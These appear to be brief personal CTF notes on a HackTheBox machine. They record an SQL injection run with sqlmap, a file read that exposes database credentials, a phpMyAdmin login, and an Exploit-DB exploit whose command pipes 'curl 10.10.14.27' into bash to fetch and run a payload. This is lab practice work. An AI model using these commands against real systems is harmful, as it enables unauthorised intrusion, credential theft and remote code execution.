CTFLover Vault
05-notes

vulnerable to sqli
http://supersecurehotel.htb/room.php?cod=1

sqlmap -u http://supersecurehotel.htb/room.php\?cod\=1 --batch

Pasted image 20231109134352.png

sqlmap -u http://supersecurehotel.htb/room.php\?cod\=1 --batch --file-read=/var/www/html/connection.php


➜  files cat _var_www_html_connection.php 
<?php
$connection=new mysqli('127.0.0.1','DBadmin','imissyou','hotel');
?>

got access through web /phpmyadmin

Pasted image 20231109151644.png

vulnerable
https://www.exploit-db.com/exploits/50457

simpler.py

python3 exploit.py 10.10.10.143 80 /phpmyadmin DBadmin imissyou 'curl 10.10.14.27 | bash'
Table Of Contents